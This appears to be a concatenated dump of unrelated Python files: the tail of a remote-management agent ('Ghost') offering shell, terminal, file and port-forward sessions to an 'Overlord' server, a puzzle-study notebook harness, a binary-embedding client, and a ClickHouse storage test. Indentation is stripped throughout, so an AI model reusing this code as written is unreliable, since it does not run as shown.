elif 'response' in msg:
self.HandleResponse(msg)
else: # Ingnore mal-formed message.
logging.error('mal-formed JSON request, ignored')
def ScanForTimeoutRequests(self):
"""Scans for pending requests which have timed out.
If any timed-out requests are discovered, their handler is called with the
special response value of None.
"""
for rid in self._requests.keys()[:]:
request_time, timeout, handler = self._requests[rid]
if self.Timestamp() - request_time > timeout:
if callable(handler):
handler(None)
else:
logging.error('Request %s timeout', rid)
del self._requests[rid]
def InitiateDownload(self):
ttyname, filename = self._download_queue.get()
sid = self._ttyname_to_sid[ttyname]
self.SpawnGhost(self.FILE, terminal_sid=sid,
file_op=('download', filename))
def Listen(self):
try:
while True:
rds, unused_wd, unused_xd = select.select([self._sock], [], [],
_PING_INTERVAL / 2)
if self._sock in rds:
data = self._sock.Recv(_BUFSIZE)
# Socket is closed
if not data:
break
self.ParseMessage(data, self._register_status != SUCCESS)
if (self._mode == self.AGENT and
self.Timestamp() - self._last_ping > _PING_INTERVAL):
self.Ping()
self.ScanForTimeoutRequests()
if not self._download_queue.empty():
self.InitiateDownload()
if self._reset.is_set():
break
except socket.error:
raise RuntimeError('Connection dropped')
except PingTimeoutError:
raise RuntimeError('Connection timeout')
finally:
self.Reset()
self._queue.put('resume')
if self._mode != Ghost.AGENT:
sys.exit(1)
def Register(self):
non_local = {}
for addr in self._overlord_addrs:
non_local['addr'] = addr
def registered(response):
if response is None:
self._reset.set()
raise RuntimeError('Register request timeout')
self._register_status = response['response']
if response['response'] != SUCCESS:
self._reset.set()
raise RuntimeError('Register: ' + response['response'])
else:
logging.info('Registered with Overlord at %s:%d', *non_local['addr'])
self._connected_addr = non_local['addr']
self.Upgrade() # Check for upgrade
self._queue.put('pause', True)
try:
logging.info('Trying %s:%d ...', *addr)
self.Reset()
# Check if server has TLS enabled. Only check if self._tls_mode is
# None.
# Only control channel needs to determine if TLS is enabled. Other mode
# should use the TLSSettings passed in when it was spawned.
if self._mode == Ghost.AGENT:
self._tls_settings.SetEnabled(
self.TLSEnabled(*addr) if self._tls_mode is None
else self._tls_mode)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(_CONNECT_TIMEOUT)
try:
if self._tls_settings.Enabled():
tls_context = self._tls_settings.Context()
sock = tls_context.wrap_socket(sock, server_hostname=addr[0])
sock.connect(addr)
except (ssl.SSLError, ssl.CertificateError) as e:
logging.error('%s: %s', e.__class__.__name__, e)
continue
except IOError as e:
if e.errno == 2: # No such file or directory
logging.error('%s: %s', e.__class__.__name__, e)
continue
raise
self._sock = BufferedSocket(sock)
logging.info('Connection established, registering...')
handler = {
Ghost.AGENT: registered,
Ghost.TERMINAL: self.SpawnTTYServer,
Ghost.SHELL: self.SpawnShellServer,
Ghost.FILE: self.InitiateFileOperation,
Ghost.FORWARD: self.SpawnPortForwardServer,
}[self._mode]
# Machine ID may change if MAC address is used (USB-ethernet dongle
# plugged/unplugged)
self._machine_id = self.GetMachineID()
self.SendRequest('register',
{'mode': self._mode, 'mid': self._machine_id,
'sid': self._session_id,
'properties': self._properties}, handler)
except socket.error:
pass
else:
sock.settimeout(None)
self.Listen()
raise RuntimeError('Cannot connect to any server')
def Reconnect(self):
logging.info('Received reconnect request from RPC server, reconnecting...')
self._reset.set()
def GetStatus(self):
status = self._register_status
if self._register_status == SUCCESS:
ip, port = self._sock.sock.getpeername()
status += ' %s:%d' % (ip, port)
return status
def AddToDownloadQueue(self, ttyname, filename):
self._download_queue.put((ttyname, filename))
def RegisterTTY(self, session_id, ttyname):
self._ttyname_to_sid[ttyname] = session_id
def RegisterSession(self, session_id, process_id):
self._terminal_sid_to_pid[session_id] = process_id
def StartLanDiscovery(self):
"""Start to listen to LAN discovery packet at
_OVERLORD_LAN_DISCOVERY_PORT."""
def thread_func():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
try:
s.bind(('0.0.0.0', _OVERLORD_LAN_DISCOVERY_PORT))
except socket.error as e:
logging.error('LAN discovery: %s, abort', e)
return
logging.info('LAN Discovery: started')
while True:
rd, unused_wd, unused_xd = select.select([s], [], [], 1)
if s in rd:
data, source_addr = s.recvfrom(_BUFSIZE)
parts = data.split()
if parts[0] == 'OVERLORD':
ip, port = parts[1].split(':')
if not ip:
ip = source_addr[0]
self._queue.put((ip, int(port)), True)
try:
obj = self._queue.get(False)
except Queue.Empty:
pass
else:
if not isinstance(obj, str):
self._queue.put(obj)
elif obj == 'pause':
logging.info('LAN Discovery: paused')
while obj != 'resume':
obj = self._queue.get(True)
logging.info('LAN Discovery: resumed')
t = threading.Thread(target=thread_func)
t.daemon = True
t.start()
def StartRPCServer(self):
logging.info('RPC Server: started')
rpc_server = SimpleJSONRPCServer((_DEFAULT_BIND_ADDRESS, _GHOST_RPC_PORT),
logRequests=False)
rpc_server.register_function(self.Reconnect, 'Reconnect')
rpc_server.register_function(self.GetStatus, 'GetStatus')
rpc_server.register_function(self.RegisterTTY, 'RegisterTTY')
rpc_server.register_function(self.RegisterSession, 'RegisterSession')
rpc_server.register_function(self.AddToDownloadQueue, 'AddToDownloadQueue')
t = threading.Thread(target=rpc_server.serve_forever)
t.daemon = True
t.start()
def ScanServer(self):
for meth in [self.GetGateWayIP, self.GetFactoryServerIP]:
for addr in [(x, _OVERLORD_PORT) for x in meth()]:
if addr not in self._overlord_addrs:
self._overlord_addrs.append(addr)
def Start(self, lan_disc=False, rpc_server=False):
logging.info('%s started', self.MODE_NAME[self._mode])
logging.info('MID: %s', self._machine_id)
logging.info('SID: %s', self._session_id)
# We don't care about child process's return code, not wait is needed. This
# is used to prevent zombie process from lingering in the system.
self.SetIgnoreChild(True)
if lan_disc:
self.StartLanDiscovery()
if rpc_server:
self.StartRPCServer()
try:
while True:
try:
addr = self._queue.get(False)
except Queue.Empty:
pass
else:
if isinstance(addr, tuple) and addr not in self._overlord_addrs:
logging.info('LAN Discovery: got overlord address %s:%d', *addr)
self._overlord_addrs.append(addr)
try:
self.ScanServer()
self.Register()
# Don't show stack trace for RuntimeError, which we use in this file for
# plausible and expected errors (such as can't connect to server).
except RuntimeError as e:
logging.info('%s, retrying in %ds', e.message, _RETRY_INTERVAL)
time.sleep(_RETRY_INTERVAL)
except Exception as e:
unused_x, unused_y, exc_traceback = sys.exc_info()
traceback.print_tb(exc_traceback)
logging.info('%s: %s, retrying in %ds',
e.__class__.__name__, e.message, _RETRY_INTERVAL)
time.sleep(_RETRY_INTERVAL)
self.Reset()
except KeyboardInterrupt:
logging.error('Received keyboard interrupt, quit')
sys.exit(0)
def GhostRPCServer():
"""Returns handler to Ghost's JSON RPC server."""
return jsonrpclib.Server('http://localhost:%d' % _GHOST_RPC_PORT)
def ForkToBackground():
"""Fork process to run in background."""
pid = os.fork()
if pid != 0:
logging.info('Ghost(%d) running in background.', pid)
sys.exit(0)
def DownloadFile(filename):
"""Initiate a client-initiated file download."""
filepath = os.path.abspath(filename)
if not os.path.exists(filepath):
logging.error('file `%s\' does not exist', filename)
sys.exit(1)
# Check if we actually have permission to read the file
if not os.access(filepath, os.R_OK):
logging.error('can not open %s for reading', filepath)
sys.exit(1)
server = GhostRPCServer()
server.AddToDownloadQueue(os.ttyname(0), filepath)
sys.exit(0)
def main():
# Setup logging format
logger = logging.getLogger()
logger.setLevel(logging.INFO)
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(message)s', '%Y/%m/%d %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
parser = argparse.ArgumentParser()
parser.add_argument('--fork', dest='fork', action='store_true', default=False,
help='fork procecess to run in background')
parser.add_argument('--mid', metavar='MID', dest='mid', action='store',
default=None, help='use MID as machine ID')
parser.add_argument('--rand-mid', dest='mid', action='store_const',
const=Ghost.RANDOM_MID, help='use random machine ID')
parser.add_argument('--no-lan-disc', dest='lan_disc', action='store_false',
default=True, help='disable LAN discovery')
parser.add_argument('--no-rpc-server', dest='rpc_server',
action='store_false', default=True,
help='disable RPC server')
parser.add_argument('--tls', dest='tls_mode', default='detect',
choices=('y', 'n', 'detect'),
help="specify 'y' or 'n' to force enable/disable TLS")
parser.add_argument('--tls-cert-file', metavar='TLS_CERT_FILE',
dest='tls_cert_file', type=str, default=None,
help='file containing the server TLS certificate in PEM '
'format')
parser.add_argument('--tls-no-verify', dest='tls_no_verify',
action='store_true', default=False,
help='do not verify certificate if TLS is enabled')
parser.add_argument('--prop-file', metavar='PROP_FILE', dest='prop_file',
type=str, default=None,
help='file containing the JSON representation of client '
'properties')
parser.add_argument('--download', metavar='FILE', dest='download', type=str,
default=None, help='file to download')
parser.add_argument('--reset', dest='reset', default=False,
action='store_true',
help='reset ghost and reload all configs')
parser.add_argument('--status', dest='status', default=False,
action='store_true',
help='show status of the client')
parser.add_argument('overlord_ip', metavar='OVERLORD_IP', type=str,
nargs='*', help='overlord server address')
args = parser.parse_args()
if args.status:
print(GhostRPCServer().GetStatus())
sys.exit()
if args.fork:
ForkToBackground()
if args.reset:
GhostRPCServer().Reconnect()
sys.exit()
if args.download:
DownloadFile(args.download)
addrs = [('localhost', _OVERLORD_PORT)]
addrs = [(x, _OVERLORD_PORT) for x in args.overlord_ip] + addrs
prop_file = os.path.abspath(args.prop_file) if args.prop_file else None
tls_settings = TLSSettings(args.tls_cert_file, not args.tls_no_verify)
tls_mode = args.tls_mode
tls_mode = {'y': True, 'n': False, 'detect': None}[tls_mode]
g = Ghost(addrs, tls_settings, Ghost.AGENT, args.mid,
prop_file=prop_file, tls_mode=tls_mode)
g.Start(args.lan_disc, args.rpc_server)
if __name__ == '__main__':
try:
main()
except Exception as e:
logging.error(e)
|
demo.py | from __future__ import print_function
import ipywidgets as widgets
from IPython.display import clear_output, display, Markdown, Javascript
import IPython
from demo import study_puzzles
from typing import List, Set, Tuple, Callable
import inspect
import shutil
import os
import re
import time
import threading
import pickle as pkl
import logging
import getpass
import subprocess
from tempfile import TemporaryDirectory
IPYNP_FILE = 'Demo.ipynb'
LOCAL = True
#temp_dir = TemporaryDirectory() # local version. Will create a new dir each time so it's not stateful...
#out_dir = temp_dir.name
out_dir = "state"
os.makedirs(out_dir, exist_ok=True)
log_path = os.path.join(out_dir, 'run.log')
logger = logging.getLogger(__name__)
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
handlers=[logging.FileHandler(log_path)],
)
_max_mins = 6
_max_seconds = _max_mins * 60
def warmup_puzzle(s: str):
return
def log(msg, level=logging.INFO):
logger.log(level, msg)
state.log.append((time.time(), level, msg))
def submit_years(years: int):
if LOCAL:
print("This is running locally")
else:
if type(years) != int:
print('Please submit an integer.')
return
log(f"Number of years programming in python: {years}.")
print('Thanks!')
def update_progress_bar():
global progress_bar
while True:
time.sleep(1.0)
try:
if progress_bar.value == progress_bar.max:
progress_bar.description = 'Out of time'
progress_bar.bar_style = 'danger'
progress_bar.value = time.time() - state.cur.start_time
except:
pass
# globals
STATE_FILENAME = os.path.join(out_dir, "state.pkl")
state = None # set by load_state function
__puzzle__ = None # set by next_puzzle function
n_attempts = None # set by puzzle function
progress_bar = None # for display
threading.Thread(target=update_progress_bar).start() # progress bar timer update thread
fireworks_gif = None # for display
global_hook = IPython.core.getipython.get_ipython().ev("globals()") # we can use to reset puzzle fun if they override
def check_hook():
if "puzzle" in global_hook and global_hook["puzzle"] is not puzzle:
# print("Uh oh, seems that you have over-rided the puzzle function. Please don't do that. Re-defining it.")
log("Doh! They overrode the puzzle function. :-(", level=logging.ERROR)
global_hook["puzzle"] = puzzle
save_state()
def restart_state():
resp = input('Are you sure you want to delete the state? type "yes" to reset or "no" to cancel: ')
if resp != 'yes':
return
print("OK!")
t = '_' + time.ctime().replace(' ', '_')
shutil.move(STATE_FILENAME, STATE_FILENAME + t)
load_state()
def load_state():
"""creates if does not exist"""
# print(" Loading state")
global state
check_hook()
if os.path.exists(STATE_FILENAME):
with open(STATE_FILENAME, "rb") as f:
state = pkl.load(f)
else:
state = State() # this is where the state is first initialized
# print("*** Creating state")
save_state()
def save_state():
check_hook()
# print(" Saving state")
with open(STATE_FILENAME, "wb") as f:
pkl.dump(state, f)
# To store snapshots of the notebook:
if False:
display(Javascript("IPython.notebook.save_notebook()"))
t = '_' + time.ctime().replace(' ', '_')
#command = f'jupyter nbconvert {IPYNP_FILE} --output {os.path.join(out_dir, IPYNP_FILE + t)}.html'
#subprocess.call(command)
time.sleep(1)
shutil.copy(IPYNP_FILE, os.path.join(out_dir, IPYNP_FILE + t + '.ipynb'))
class PuzzleData:
def __init__(self, src: str, num: int, name: str, part: str):
self.num = num
self.name = name
self.part = part
self.start_time = None
self.solve_time = None
self.give_up_time = None
self.n_attempts = None
self.src = src
def __str__(self):
return f"""
num = {self.num}
name = {self.name}
part = {self.part}
start_time = {self.start_time}
solve_time = {self.solve_time}
give_up_time ={self.give_up_time}
n_attempts = {self.n_attempts}
src = {self.src}"""
class State:
"""
state.cur points to the PuzzleData of state.puzzles that we are currently on. When done, state.cur is None.
initially state.cur = self.puzzles[0] but its start_time is None.
"""
def __init__(self):
self.log = [] # redundant log
self.puzzles = []
for p in study_puzzles.get_puzzles():
self.puzzles.append(PuzzleData(p["src"], len(self.puzzles), p["name"], p["part"]))
self.cur = self.puzzles[0]
def __str__(self):
return f"cur: {self.cur}" + "\n" + f"log: [{len(self.log)}]" + "\n".join(str(l)[:100] for l in self.log[-5:])
def submit_feedback(text):
log("Feedback: " + text)
save_state()
if LOCAL:
print("This is the local version so we won't see this. But please send us an email!")
else:
print("Feedback logged, thank you!")
def notify_next():
print("Run next_puzzle() when you are ready to begin the next puzzle.")
def cur_puzzle(reload_state=True):
if reload_state:
load_state()
if state.cur is None:
print(f"All parts complete!")
print_solving_times()
return
if state.cur.start_time is None or state.cur.solve_time is not None or state.cur.give_up_time is not None:
notify_next()
return
if time.time() - state.cur.start_time > _max_seconds:
print('Time is up.')
give_up()
return
reset_widgets()
display(progress_bar)
if state.cur.give_up_time is None and time.time() - state.cur.start_time > _max_seconds:
print("Out of time.")
print(f"{state.cur.name} ({state.cur.part})") # (STUDY {_study_idx}/{NUM_STUDIES}):")
print("============")
print()
print(state.cur.src)
with open("fireworks.gif", "rb") as f:
_fireworks_image = f.read()
def reset_widgets(): # close existing widgets
try:
global progress_bar, fireworks_gif
if progress_bar is not None:
progress_bar.close()
progress_bar = widgets.IntProgress(value=0, min=0, max=_max_seconds, description='Time:', bar_style='warning')
if fireworks_gif is not None:
fireworks_gif.close()
fireworks_gif = widgets.Image(
value=_fireworks_image,
format='gif',
width=100,
height=200,
)
except Exception as e:
logger.error("reset_widgets exception")
def print_solving_times():
print("=" * 10)
print('Check our "Programming Puzzles" paper (section 5.1) to see how difficult GPT-3 and others found each puzzle to be: https://arxiv.org/abs/2106.05784')
print()
print('Visit our GitHub repository to explore the full dataset and contribute your own puzzles: https://github.com/microsoft/PythonProgrammingPuzzles')
print("=" * 10)
print("Your solving times (minutes:seconds):")
for i, puz in enumerate(state.puzzles):
if i < 3:
# Warmup.
continue
if state.cur is not None and state.cur.num < puz.num:
return
if puz.solve_time:
elapsed = puz.solve_time - puz.start_time
time_str = time.strftime("%M:%S", time.gmtime(elapsed))
print(f"Puzzle {puz.num - 2}: {time_str}")
else:
print(f"Puzzle {puz.num - 2}: Unsolved")
def check_finished_part():
if state.cur is None:
cur_puzzle(reload_state=False)
elif state.cur is state.puzzles[-1]: # done!
state.cur = None
save_state()
cur_puzzle(reload_state=False) # notifies that they are done
return True
else:
if state.cur.part != state.puzzles[state.cur.num + 1].part:
print(f"Finished {state.cur.part}!!!")
print("Continue to the next part when you are ready.")
if state.cur.part != "WARM UP": # Warmup
print_solving_times()
else:
print("You will get a summary of your solving times after each part.")
state.cur = state.puzzles[state.cur.num + 1]
save_state()
return True
return False
def give_up():
# don't load state
check_hook()
if state.cur is None:
cur_puzzle() # notifies them that they are done
return
if state.cur.solve_time:
print("Cannot give up since you already solved this puzzle.")
else:
if not state.cur.start_time:
print("Cannot give up on a puzzle before you started it.")
elif state.cur.give_up_time is None:
elapsed = time.time() - state.cur.start_time
if elapsed < _max_seconds:
resp = input('Are you sure you want to give up on this puzzle? type "yes" to give up or "no" to keep trying: ')
if resp != 'yes':
return
state.cur.give_up_time = time.time()
elapsed = state.cur.give_up_time - state.cur.start_time
if last["num"] == state.cur.num:
state.cur.n_attempts = last["n_attempts"]
log(f"Gave up {state.cur.num} after {elapsed:.2f} seconds and {last['n_attempts']} attempts")
reset_widgets()
save_state()
if check_finished_part():
return
notify_next()
def next_puzzle():
load_state()
if state.cur is None: # already done
cur_puzzle(reload_state=False) # prints completion msg
return
if state.cur.start_time is not None:
if state.cur.solve_time is None and state.cur.give_up_time is None:
elapsed = time.time() - state.cur.start_time
if elapsed < _max_seconds:
print(f"You haven't solved this puzzle yet and time has not expired.")
print(f"You have {_max_seconds - elapsed:.0f} seconds to continue trying to solve the puzzle.")
print("You may type give_up() and then next_puzzle(), or cur_puzzle() to see the current puzzle.")
return
else:
log(f"Time out {state.cur.num} after {elapsed:.2f} seconds and {last['n_attempts']} attempts")
reset_widgets()
if check_finished_part():
return
state.cur = state.puzzles[state.cur.num + 1]
else:
reset_widgets()
state.cur.start_time = time.time()
save_state()
cur_puzzle(reload_state=False)
def check_type(x): # TODO: update to multiple arguments, tuples, and functions
desired_type_str = re.match(r"def puzzle\([^:]*: (.*)\)", state.cur.src).groups(1)[0].strip()
def helper(obj, type_str):
t = type(obj)
if type_str == "int":
success = t == int
elif type_str == "str":
success = t == str
elif type_str == "float":
success = t == float
else:
assert "[" in type_str and type_str[-1] == "]", f"Unknown type {type_str}"
inner_type = type_str[type_str.index("[") + 1:-1].strip()
success = False
if type_str.startswith("List"):
if t == list:
if not all(helper(y, inner_type) for y in obj):
return False
success = True
elif type_str.startswith("Set"):
if t == set:
if not all(helper(y, inner_type) for y in obj):
return False
success = True
else:
assert False, f"TODO: implement type checking for '{type_str}'"
if not success:
print(f"TypeError: puzzle expecting {type_str}, got type {t} in: {str(obj)[:50]}...")
return success
return helper(x, desired_type_str)
last = { # previous evaluation, tracked so we don't load_state if called a million times in a loop
"num": None,
"time": None,
"n_attempts": None,
"func": None
}
class AlreadySolvedError(Exception):
pass
def puzzle(solution):
if state.cur is None or state.cur.num != last["num"] or time.time() - last["time"] > 10:
load_state() # if more than 10 seconds have elapsed since last attempt
if state.cur is None:
cur_puzzle() # notify that all done
return
if state.cur.start_time is None:
print("Haven't started.")
notify_next()
return
if state.cur.num != last["num"]:
loc = locals().copy()
exec(state.cur.src, None, loc)
last["func"] = loc["puzzle"]
last["num"] = state.cur.num
last["n_attempts"] = 0
if state.cur.solve_time is not None:
print(f"You've already solved {state.cur.name}")
notify_next()
raise AlreadySolvedError
if state.cur.give_up_time is not None:
print(f"You ran out of time for {state.cur.name}")
notify_next()
return
last["n_attempts"] += 1
last["time"] = time.time()
if time.time() - state.cur.start_time > _max_seconds:
print('Time is up.')
give_up()
return
if not check_type(solution):
return TypeError
puzzle_ = last["func"]
result = puzzle_(solution) # exceptions happen
last["time"] = time.time()
elapsed = last["time"] - state.cur.start_time
if result is True:
reset_widgets()
state.cur.solve_time = last["time"]
state.cur.n_attempts = last["n_attempts"] # only update when solved or give up
time_str = time.strftime("%M:%S", time.gmtime(elapsed))
display(Markdown(f'<span style="color: green">CORRECT in {time_str} sec.</span>'))
log(f"Solved {state.cur.num} in {elapsed:.2f} seconds using {last['n_attempts']} attempts")
save_state()
display(fireworks_gif, widgets.Output())
check_finished_part()
return result
load_state() # initialize
|
yara_safe.py | import os
import hashlib
import json
from FunctionAnalyzerRadare import RadareFunctionAnalyzer
from InstructionsConverter import InstructionsConverter
from FunctionNormalizer import FunctionNormalizer
import requests
from multiprocessing import Process, Queue
import traceback
import tempfile
import sys
tf_serving = "http://yarasafe.diag.uniroma1.it:8500/v1/models/safe:predict"
def read_string_from_pipe(f):
byte = True
received = ""
while byte:
byte = os.read(f,1)
if byte == b'\0':
break
received += byte.decode("utf-8")
return received
def read_stream_from_pipe(f, bytes_to_read):
received = bytes()
for i in range(0, bytes_to_read):
byte = os.read(f,1)
received += byte
return received
def write_string_to_pipe(f, msg):
for c in msg:
os.write(f,bytes(c, 'utf-8'))
os.write(f, b'\0')
return len(msg)
def wait_for_programs(f):
msg_bytes = int(read_string_from_pipe(f))
msg = read_stream_from_pipe(f, msg_bytes)
return msg, msg_bytes
def check_exit(msg):
if len(msg) == 4 and msg == b"exit":
return True
else:
return False
def worker(queue, name):
#analyzer = IDAFunctionAnalyzer(name, False, 0)
analyzer = RadareFunctionAnalyzer(name, False, 0)
functions = analyzer.analyze()
queue.put(functions)
analyzer.close()
def embedd_program(program, converter):
try:
tmp_file = tempfile.NamedTemporaryFile("wb", delete=False)
tmp_file.write(program)
name = tmp_file.name
tmp_file.close()
#print("[DEBUG] Analyzing file with sha256: {}, size: {}".format(hash, str(len(program))))
q = Queue()
p = Process(target=worker, args=(q, name))
p.start()
functions = q.get()
p.join()
normalizer = FunctionNormalizer(150)
converted = []
#for f in functions:
# converted.append(converter.convert_to_ids(functions[f]['filtered_instructions']))
#instructions, lenghts = normalizer.normalize_functions(converted)
#payload = {"signature_name":"safe", "inputs":{"instruction":instructions, "lenghts":lenghts}}
#print("[Python] Computing embedding, found {} function".format(len(converted)))
#r = requests.post(tf_serving, data=json.dumps(payload))
#embeddings = json.loads(r.text)
embeddings = []
num_fcns = len(functions)
fcns = []
new_fcn = []
for i, f in enumerate(functions):
fcns.append(f)
converted.append(converter.convert_to_ids(functions[f]['filtered_instructions']))
if (i % 500 == 0) or (i == num_fcns - 1):
instructions, lenghts = normalizer.normalize_functions(converted)
converted = []
payload = {"signature_name": "safe", "inputs": {"instruction": instructions, "lenghts": lenghts}}
r = requests.post(tf_serving, data=json.dumps(payload))
tmp = json.loads(r.text)
if "outputs" in tmp:
new_fcn.extend(fcns)
embeddings.extend(tmp["outputs"])
fcns = []
result = {}
if len(embeddings) == 0:
if os.path.exists(name):
os.remove(name)
return result
for i, f in enumerate(new_fcn):
result[f] = embeddings[i]
except:
traceback.print_exc()
result = {}
if os.path.exists(name):
os.remove(name)
try:
os.remove(name)
except:
pass
return(result)
def launch(bytes):
#print("[Python] Hello from python len: {}".format(len(bytes)))
w2id_path = os.path.join(os.environ["YARAPYSCRIPT"], "i2v", "word2id.json")
converter = InstructionsConverter(w2id_path)
result = embedd_program(bytes, converter)
#print("[Python] embedding done")
return json.dumps(result)
if __name__ == "__main__":
f = open(sys.argv[1], "rb")
content = f.read()
f.close()
w2id_path = os.path.join(os.environ["YARAPYSCRIPT"], "i2v", "word2id.json")
converter = InstructionsConverter(w2id_path)
result = embedd_program(content, converter)
#print("[Python] embedding done")
print(json.dumps(result))
|
test.py | import json
import pytest
import random
import re
import string
import threading
import time
from multiprocessing.dummy import Pool
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1',
config_dir='configs',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
stay_alive=True,
tmpfs=['/jbod1:size=40M', '/jbod2:size=40M', '/external:size=200M'],
macros={"shard": 0, "replica": 1} )
node2 = cluster.add_instance('node2',
config_dir='configs',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
stay_alive=True,
tmpfs=['/jbod1:size=40M', '/jbod2:size=40M', '/external:size=200M'],
macros={"shard": 0, "replica": 2} )
@pytest.fixture(scope="module")
def start_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
def test_system_tables(start_cluster):
expected_disks_data = [
{
"name": "default",
"path": "/var/lib/clickhouse/",
"keep_free_space": '1024',
},
{
"name": "jbod1",
"path": "/jbod1/",
"keep_free_space": '0',
},
{
"name": "jbod2",
"path": "/jbod2/",
"keep_free_space": '10485760',
},
{
"name": "external",
"path": "/external/",
"keep_free_space": '0',
}
]
click_disk_data = json.loads(node1.query("SELECT name, path, keep_free_space FROM system.disks FORMAT JSON"))["data"]
assert sorted(click_disk_data, key=lambda x: x["name"]) == sorted(expected_disks_data, key=lambda x: x["name"])
expected_policies_data = [
{
"policy_name": "small_jbod_with_external",
"volume_name": "main",
"volume_priority": "1",
"disks": ["jbod1"],
"max_data_part_size": "0",
"move_factor": 0.1,
},
{
"policy_name": "small_jbod_with_external",
"volume_name": "external",
"volume_priority": "2",
"disks": ["external"],
"max_data_part_size": "0",
"move_factor": 0.1,
},
{
"policy_name": "one_more_small_jbod_with_external",
"volume_name": "m",
"volume_priority": "1",
"disks": ["jbod1"],
"max_data_part_size": "0",
"move_factor": 0.1,
},
{
"policy_name": "one_more_small_jbod_with_external",
"volume_name": "e",
"volume_priority": "2",
"disks": ["external"],
"max_data_part_size": "0",
"move_factor": 0.1,
},
{
"policy_name": "jbods_with_external",
"volume_name": "main",
"volume_priority": "1",
"disks": ["jbod1", "jbod2"],
"max_data_part_size": "10485760",
"move_factor": 0.1,
},
{
"policy_name": "jbods_with_external",
"volume_name": "external",
"volume_priority": "2",
"disks": ["external"],
"max_data_part_size": "0",
"move_factor": 0.1,
},
{
"policy_name": "moving_jbod_with_external",
"volume_name": "main",
"volume_priority": "1",
"disks": ["jbod1"],
"max_data_part_size": "0",
"move_factor": 0.7,
},
{
"policy_name": "moving_jbod_with_external",
"volume_name": "external",
"volume_priority": "2",
"disks": ["external"],
"max_data_part_size": "0",
"move_factor": 0.7,
},
{
"policy_name": "default_disk_with_external",
"volume_name": "small",
"volume_priority": "1",
"disks": ["default"],
"max_data_part_size": "2097152",
"move_factor": 0.1,
},
{
"policy_name": "default_disk_with_external",
"volume_name": "big",
"volume_priority": "2",
"disks": ["external"],
"max_data_part_size": "20971520",
"move_factor": 0.1,
},
{
"policy_name": "special_warning_policy",
"volume_name": "special_warning_zero_volume",
"volume_priority": "1",
"disks": ["default"],
"max_data_part_size": "0",
"move_factor": 0.1,
},
{
"policy_name": "special_warning_policy",
"volume_name": "special_warning_default_volume",
"volume_priority": "2",
"disks": ["external"],
"max_data_part_size": "0",
"move_factor": 0.1,
},
{
"policy_name": "special_warning_policy",
"volume_name": "special_warning_small_volume",
"volume_priority": "3",
"disks": ["jbod1"],
"max_data_part_size": "1024",
"move_factor": 0.1,
},
{
"policy_name": "special_warning_policy",
"volume_name": "special_warning_big_volume",
"volume_priority": "4",
"disks": ["jbod2"],
"max_data_part_size": "1024000000",
"move_factor": 0.1,
},
]
clickhouse_policies_data = json.loads(node1.query("SELECT * FROM system.storage_policies WHERE policy_name != 'default' FORMAT JSON"))["data"]
def key(x):
return (x["policy_name"], x["volume_name"], x["volume_priority"])
assert sorted(clickhouse_policies_data, key=key) == sorted(expected_policies_data, key=key)
def test_query_parser(start_cluster):
try:
with pytest.raises(QueryRuntimeException):
node1.query("""
CREATE TABLE table_with_absent_policy (
d UInt64
) ENGINE = MergeTree()
ORDER BY d
SETTINGS storage_policy='very_exciting_policy'
""")
with pytest.raises(QueryRuntimeException):
node1.query("""
CREATE TABLE table_with_absent_policy (
d UInt64
) ENGINE = MergeTree()
ORDER BY d
SETTINGS storage_policy='jbod1'
""")
node1.query("""
CREATE TABLE table_with_normal_policy (
d UInt64
) ENGINE = MergeTree()
ORDER BY d
SETTINGS storage_policy='default'
""")
node1.query("INSERT INTO table_with_normal_policy VALUES (5)")
with pytest.raises(QueryRuntimeException):
node1.query("ALTER TABLE table_with_normal_policy MOVE PARTITION 'all' TO VOLUME 'some_volume'")
with pytest.raises(QueryRuntimeException):
node1.query("ALTER TABLE table_with_normal_policy MOVE PARTITION 'all' TO DISK 'some_volume'")
with pytest.raises(QueryRuntimeException):
node1.query("ALTER TABLE table_with_normal_policy MOVE PART 'xxxxx' TO DISK 'jbod1'")
with pytest.raises(QueryRuntimeException):
node1.query("ALTER TABLE table_with_normal_policy MOVE PARTITION 'yyyy' TO DISK 'jbod1'")
with pytest.raises(QueryRuntimeException):
node1.query("ALTER TABLE table_with_normal_policy MODIFY SETTING storage_policy='moving_jbod_with_external'")
finally:
node1.query("DROP TABLE IF EXISTS table_with_normal_policy")
@pytest.mark.parametrize("name,engine", [
("test_alter_policy","MergeTree()"),
("replicated_test_alter_policy","ReplicatedMergeTree('/clickhouse/test_alter_policy', '1')",),
])
def test_alter_policy(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
d UInt64
) ENGINE = {engine}
ORDER BY d
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
assert node1.query("""SELECT storage_policy FROM system.tables WHERE name = '{name}'""".format(name=name)) == "small_jbod_with_external\n"
with pytest.raises(QueryRuntimeException):
node1.query("""ALTER TABLE {name} MODIFY SETTING storage_policy='one_more_small_jbod_with_external'""".format(name=name))
assert node1.query("""SELECT storage_policy FROM system.tables WHERE name = '{name}'""".format(name=name)) == "small_jbod_with_external\n"
node1.query("""ALTER TABLE {name} MODIFY SETTING storage_policy='jbods_with_external'""".format(name=name))
assert node1.query("""SELECT storage_policy FROM system.tables WHERE name = '{name}'""".format(name=name)) == "jbods_with_external\n"
with pytest.raises(QueryRuntimeException):
node1.query("""ALTER TABLE {name} MODIFY SETTING storage_policy='small_jbod_with_external'""".format(name=name))
assert node1.query("""SELECT storage_policy FROM system.tables WHERE name = '{name}'""".format(name=name)) == "jbods_with_external\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
def get_random_string(length):
return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(length))
def get_used_disks_for_table(node, table_name):
